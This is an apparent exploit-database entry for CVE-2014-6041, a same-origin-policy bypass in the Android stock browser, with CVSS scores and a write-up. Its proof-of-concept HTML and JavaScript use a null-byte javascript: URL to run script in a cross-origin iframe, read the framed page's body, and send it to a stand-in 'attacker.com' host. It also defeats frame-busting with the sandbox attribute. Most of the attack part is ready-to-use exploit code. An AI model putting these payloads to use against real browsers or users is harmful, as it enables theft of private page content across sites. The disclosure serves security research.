Android Browser Same Origin Policy Bypass

2014.09.03

Credit: rafayhackingarticles

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2014-6041

CWE: N/A

CVSS Base Score: 5.8/10

Impact Subscore: 4.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: None

Proof Of Concept 
<iframe name="test" src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:alert(document.domain)','test')" >

As you can see that the code tries accessing the document.domain property of a site loaded into an iframe. If you run the POC at attacker.com on any of the modern browsers, it would return a similar error as attacker.com should not be able to access the document.domain property of rhainfosec.com.

Blocked a frame with origin "http://jsbin.com" from accessing a frame with origin "http://www.rhainfosec.com". Protocols, domains, and ports must match.

    vagugebiweja:7


However, running it on any of the vulnerable smart phones default browsers would alert the document.domain property indicating that the SOP was not able to restrict the access to document.domain property of a site at a different origin.

I created the following POC, so you can mess around with some stuff:


Reading the response
You can read the response of any page by accessing the document.body.innerHTML property.

<iframe name="test" src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')" >
Reading the response and sending it to an attackers domain
In real world situation an attacker would send the response to his controlled domain. 

<iframe name="test" src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:var i=new Image();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')" >


Bypassing Frame Busting Code
A lot of websites still use frame busting code to prevent the page from being prevent and since we can only bypass SOP here when the site could be framed. In case, where the site is using a frame busting code, we can bypass it using the sandbox attribute that was introduced as a part of HTML5 specifications.

<iframe name="test" src="http://www.rhainfosec.com" sandbox></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:var i=new Image();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')" >
Affected Versions
The initial tests were carried out on android browser 4.2.1 (Qmobile) and below and later verified with Galaxy S3, HTC wildfire, Sony Xperia, Qmobile etc.

The following are some of the smartphones i tested with browserstack.com.
- See more at: http://www.rafayhackingarticles.net/2014/08/android-browser-same-origin-policy.html#sthash.Ugx7u7lq.dpuf

References:

http://www.rafayhackingarticles.net/2014/08/android-browser-same-origin-policy.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Android Browser Same Origin Policy Bypass

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.